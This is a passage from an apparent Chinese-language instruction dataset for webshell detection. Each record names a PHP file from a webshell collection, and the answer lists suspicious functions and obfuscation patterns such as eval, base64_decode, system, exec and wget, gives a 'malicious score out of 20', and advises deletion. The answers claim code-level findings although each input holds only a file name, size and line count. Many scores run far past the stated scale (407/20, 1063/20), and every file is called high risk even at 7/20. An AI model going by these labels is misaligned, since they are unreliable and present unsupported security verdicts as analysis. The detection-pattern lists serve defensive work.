"xl7dev-webshell/Php/boffmax_v1.0_web_shell_by_the-c0de_team(1).php", "malicious_score": 18, "md5_hash": "2b2a4d16663c80a265d82dfe068c82d9"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"sniffer.php\", \"文件类型\": \"php\", \"文件大小\": \"4046 bytes\", \"行数\": 181}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 包含网络功能: socket_create 恶意度评分: 10/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/sniffer.php", "malicious_score": 10, "md5_hash": "7b26e79184d2b634ee30e446b49627e1"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"I-47 v1.3.php\", \"文件类型\": \"php\", \"文件大小\": \"93550 bytes\", \"行数\": 17}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/I-47 v1.3.php", "malicious_score": 8, "md5_hash": "c6916c1be3d879b725fcda6145d58a1a"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b374k.php.php\", \"文件类型\": \"php\", \"文件大小\": \"31368 bytes\", \"行数\": 266}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/b374k.php.php", "malicious_score": 15, "md5_hash": "a14cc5cba0fda5e330f8d8df25d8076c"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PhpSpy Ver 2006.php\", \"文件类型\": \"php\", \"文件大小\": \"48162 bytes\", \"行数\": 1309}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, $_POST[ 发现混淆技术: pack\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 407/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/PhpSpy Ver 2006.php", "malicious_score": 407, "md5_hash": "a6d5d372bad4c153514246b2924fd268"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c99_webshell.php\", \"文件类型\": \"php\", \"文件大小\": \"180575 bytes\", \"行数\": 6554}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 273/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/c99_webshell.php", "malicious_score": 273, "md5_hash": "503e4d25da6d7cd9dfb5e45d95f60b55"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"devilzShell.php\", \"文件类型\": \"php\", \"文件大小\": \"48668 bytes\", \"行数\": 1213}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, $_POST[ 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 256/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/devilzShell.php", "malicious_score": 256, "md5_hash": "02e8597a4ddade7b69f6fa546ebfe170"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Silic Group php Webshell v3.php\", \"文件类型\": \"php\", \"文件大小\": \"126944 bytes\", \"行数\": 1928}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, gzinflate, pack\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1063/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Silic Group php Webshell v3.php", "malicious_score": 1063, "md5_hash": "51d5d632a5d4545a609a6c8990239601"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"B374k Beta ShElL V1.php\", \"文件类型\": \"php\", \"文件大小\": \"20980 bytes\", \"行数\": 434}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, $_GET[, $_COOKIE[, eval(, $_POST[ 发现混淆技术: base64_decode, gzinflate 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/B374k Beta ShElL V1.php", "malicious_score": 37, "md5_hash": "66144a44ebe94c5398cfcbd3cdf04f99"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"listfile.php\", \"文件类型\": \"php\", \"文件大小\": \"1930 bytes\", \"行数\": 45}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_POST[, file_get_contents( 具备文件操作能力: unlink\\s*\\(, file_put_contents 恶意度评分: 38/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/listfile.php", "malicious_score": 38, "md5_hash": "d905d2d696dec14786b92b46d6ad2ab3"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"lama's'hell v. 3.0.php\", \"文件类型\": \"php\", \"文件大小\": \"2480 bytes\", \"行数\": 89}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 具备文件操作能力: move_uploaded_file 恶意度评分: 19/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/lama's'hell v. 3.0.php", "malicious_score": 19, "md5_hash": "de9abc2e38420cad729648e93dfc6687"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"t57shell.php\", \"文件类型\": \"php\", \"文件大小\": \"11570 bytes\", \"行数\": 345}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, fwrite(, $_POST[, exec( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 47/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/t57shell.php", "malicious_score": 47, "md5_hash": "9d5e2685cf4d2fd8613ae94afc014e3f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"megabor.php\", \"文件类型\": \"php\", \"文件大小\": \"42691 bytes\", \"行数\": 660}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, base64_decode (, file_get_contents(, $_GET[, system ( 发现混淆技术: base64_decode 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 527/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/megabor.php", "malicious_score": 527, "md5_hash": "3acaa237f3d78e70230e799fa1bc5fa2"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"DTool Pro.php\", \"文件类型\": \"php\", \"文件大小\": \"14444 bytes\", \"行数\": 198}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, exec(, system(, passthru( 包含网络功能: wget 具备文件操作能力: fwrite\\s*\\( 恶意度评分: 41/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/DTool Pro.php", "malicious_score": 41, "md5_hash": "366ad973a3f327dfbfb915b0faaea5a6"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bitwise.php\", \"文件类型\": \"php\", \"文件大小\": \"1044 bytes\", \"行数\": 34}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, eval( 具备文件操作能力: file_put_contents 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/bitwise.php", "malicious_score": 7, "md5_hash": "895368fca64bcd542c1c60f0512e4d1c"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Security House - Shell Center - Edited By KingDefacer.php\", \"文件类型\": \"php\", \"文件大小\": \"1523 bytes\", \"行数\": 58}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_GET[, exec( 包含网络功能: curl_exec 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 17/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Security House - Shell Center - Edited By KingDefacer.php", "malicious_score": 17, "md5_hash": "fd28cf2b36ffdef0a67774908627183b"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHP Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"38250 bytes\", \"行数\": 1010}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, fwrite(, system(, exec( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 17/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/PHP Shell.php", "malicious_score": 17, "md5_hash": "a2f8fa4cce578fc9c06f8e674b9e63fd"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Deface Keeper 0.2.php\", \"文件类型\": \"php\", \"文件大小\": \"1653 bytes\", \"行数\": 40}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Deface Keeper 0.2.php", "malicious_score": 8, "md5_hash": "7951fc4108264ab853eaaa9414176900"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Aria cPanel cracker version 1.0 - Edited By KingDefacer.php\", \"文件类型\": \"php\", \"文件大小\": \"8773 bytes\", \"行数\": 178}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[, exec(, eval(, $_POST[ 发现混淆技术: base64_decode 包含网络功能: curl_exec 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 55/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Aria cPanel cracker version 1.0 - Edited By KingDefacer.php", "malicious_score": 55, "md5_hash": "27d59c8914ee43ee6f057fbb17473003"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Password Hasher for PHP Shell 2.1.php\", \"文件类型\": \"php\", \"文件大小\": \"2765 bytes\", \"行数\": 100}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Password Hasher for PHP Shell 2.1.php", "malicious_score": 12, "md5_hash": "ba120abac165a5a30044428fac1970d8"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"h4ntu_shell_[powered_by_tsoi].php\", \"文件类型\": \"php\", \"文件大小\": \"2553 bytes\", \"行数\": 78}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, system(, exec( 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/h4ntu_shell_[powered_by_tsoi].php", "malicious_score": 12, "md5_hash": "06ed0b2398f8096f1bebf092d0526137"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"lamashell.php\", \"文件类型\": \"php\", \"文件大小\": \"2569 bytes\", \"行数\": 89}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 具备文件操作能力: move_uploaded_file 恶意度评分: 19/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/lamashell.php", "malicious_score": 19, "md5_hash": "de9abc2e38420cad729648e93dfc6687"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"udf.dll 专用网马.php\", \"文件类型\": \"php\", \"文件大小\": \"120743 bytes\", \"行数\": 87}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/udf.dll 专用网马.php", "malicious_score": 9, "md5_hash": "416ed8e6fecc31cb996fef9d5e78a7c6"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"LOTFREE PHP Backdoor v1.5.php\", \"文件类型\": \"php\", \"文件大小\": \"3865 bytes\", \"行数\": 133}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_REQUEST[, system( 具备文件操作能力: move_uploaded_file, unlink\\s*\\( 恶意度评分: 53/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/LOTFREE PHP Backdoor v1.5.php", "malicious_score": 53, "md5_hash": "0fdb401a49fc2e481e3dfd697078334b"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ex0shell.php\", \"文件类型\": \"php\", \"文件大小\": \"41637 bytes\", \"行数\": 601}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, base64_decode (, file_get_contents(, $_GET[, system ( 发现混淆技术: base64_decode 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 527/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/ex0shell.php", "malicious_score": 527, "md5_hash": "4e960428a57c08b4c862e9de003dff3f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Safe mode breaker.php\", \"文件类型\": \"php\", \"文件大小\": \"2244 bytes\", \"行数\": 94}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Safe mode breaker.php", "malicious_score": 9, "md5_hash": "5bd07ccb1111950a5b47327946bfa194"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"mysql_tool.php\", \"文件类型\": \"php\", \"文件大小\": \"34158 bytes\", \"行数\": 1078}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, base64_decode( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 16/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/mysql_tool.php", "malicious_score": 16, "md5_hash": "5fbe4d8edeb2769eda5f4add9bab901e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"GRP WebShell 2.0 release build 2018 (C)2006,Great.php\", \"文件类型\": \"php\", \"文件大小\": \"16928 bytes\", \"行数\": 575}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[, exec(, system(, eval( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 142/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/GRP WebShell 2.0 release build 2018 (C)2006,Great.php", "malicious_score": 142, "md5_hash": "c85dd76c417715cc06b4e5285ddc0367"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ru24_post_sh.php\", \"文件类型\": \"php\", \"文件大小\": \"520 bytes\", \"行数\": 23}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/ru24_post_sh.php", "malicious_score": 15, "md5_hash": "5b334d494564393f419af745dc1eeec7"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PH Vayv.php\", \"文件类型\": \"php\", \"文件大小\": \"25274 bytes\", \"行数\": 597}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, mkdir\\s*\\( 恶意度评分: 10/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/PH Vayv.php", "malicious_score": 10, "md5_hash": "ed360ac55c5ac7312a61170e53c6e35d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Worse Linux Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"2524 bytes\", \"行数\": 69}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, system( 恶意度评分: 18/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Worse Linux Shell.php", "malicious_score": 18, "md5_hash": "8338c8d9eab10bd38a7116eb534b5fa2"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ironshell.php\", \"文件类型\": \"php\", \"文件大小\": \"18370 bytes\", \"行数\": 588}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[, fwrite(, $_COOKIE[, $_POST[ 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 221/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/ironshell.php", "malicious_score": 221, "md5_hash": "8bfa2eeb8a3ff6afc619258e39fded56"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"dC3_Security_Crew_Shell_PRiV.php\", \"文件类型\": \"php\", \"文件大小\": \"44670 bytes\", \"行数\": 1274}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[, fwrite(, $_POST[, exec( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 350/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/dC3_Security_Crew_Shell_PRiV.php", "malicious_score": 350, "md5_hash": "a8b5f5b63f3293341871d8fa59e876bb"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"php-backdoor.php\", \"文件类型\": \"php\", \"文件大小\": \"2800 bytes\", \"行数\": 71}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, $_REQUEST[, system( 具备文件操作能力: fopen\\s*\\(, move_uploaded_file 恶意度评分: 53/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/php-backdoor.php", "malicious_score": 53, "md5_hash": "2b5cb105c4ea9b5ebc64705b4bd86bf7"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"stres.php\", \"文件类型\": \"php\", \"文件大小\": \"41501 bytes\", \"行数\": 926}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, fputs(, exec(, $_POST[ 发现混淆技术: chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 188/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/stres.php", "malicious_score": 188, "md5_hash": "1b8f11ac6389f07257d98554bbb0da66"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"backupsql.php\", \"文件类型\": \"php\", \"文件大小\": \"6500 bytes\", \"行数\": 170}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, shell_exec(, exec( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 14/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/backupsql.php", "malicious_score": 14, "md5_hash": "ab1a06ab1a1fe94e3f3b7f80eedbc12f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"kolang-bypass.php\", \"文件类型\": \"php\", \"文件大小\": \"19611 bytes\", \"行数\": 357}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, fwrite(, base64_decode( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, file_put_contents, fwrite\\s*\\( 恶意度评分: 47/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/kolang-bypass.php", "malicious_score": 47, "md5_hash": "4449148c994431c93d38cfade8f237bd"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"404.php\", \"文件类型\": \"php\", \"文件大小\": \"15005 bytes\", \"行数\": 38}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 16/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/404.php", "malicious_score": 16, "md5_hash": "ced050df5ca42064056a7ad610a191b3"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Loaderz WEB Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"13893 bytes\", \"行数\": 513}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, fputs(, exec(, $_POST[, system( 具备文件操作能力: fopen\\s*\\(, copy\\s*\\(, fwrite\\s*\\( 恶意度评分: 108/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Loaderz WEB Shell.php", "malicious_score": 108, "md5_hash": "9987057e5fd0b19005a6172447d232a9"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Small Web Shell by ZaCo.php\", \"文件类型\": \"php\", \"文件大小\": \"15927 bytes\", \"行数\": 501}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[, eval( 具备文件操作能力: fopen\\s*\\(, copy\\s*\\(, fwrite\\s*\\( 恶意度评分: 144/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Small Web Shell by ZaCo.php", "malicious_score": 144, "md5_hash": "dbf6ef2ded67b76fcb03eec004ac06fa"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Web-shell (c)ShAnKaR.php\", \"文件类型\": \"php\", \"文件大小\": \"27005 bytes\", \"行数\": 644}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[, fputs(, exec( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 677/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Web-shell (c)ShAnKaR.php", "malicious_score": 677, "md5_hash": "330af9337ae51d0bac175ba7076d6299"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Shell [ci] .Biz was here.php\", \"文件类型\": \"php\", \"文件大小\": \"161913 bytes\", \"行数\": 3149}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 273/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Shell [ci] .Biz was here.php", "malicious_score": 273, "md5_hash": "82991339b97aa882846d0f8f5f160db7"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Shell Commander.php\", \"文件类型\": \"php\", \"文件大小\": \"9478 bytes\", \"行数\": 322}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_REQUEST[, shell_exec(, exec( 发现混淆技术: ord\\s*\\( 恶意度评分: 95/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Shell Commander.php", "malicious_score": 95, "md5_hash": "554e50c1265bb0934fcc8247ec3b9052"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Sosyete Safe Mode Bypass Shell - Edited By KingDefacer.php\", \"文件类型\": \"php\", \"文件大小\": \"7677 bytes\", \"行数\": 221}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, shell_exec(, exec( 恶意度评分: 18/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Sosyete Safe Mode Bypass Shell - Edited By KingDefacer.php", "malicious_score": 18, "md5_hash": "3feaebedd3ae2f2d2689df5796970436"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"myshell.php\", \"文件类型\": \"php\", \"文件大小\": \"16114 bytes\", \"行数\": 420}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: system(, fputs(, exec( 发现混淆技术: chr\\s*\\( 具备文件操作能力: fopen\\s*\\( 恶意度评分: 39/20 建议: 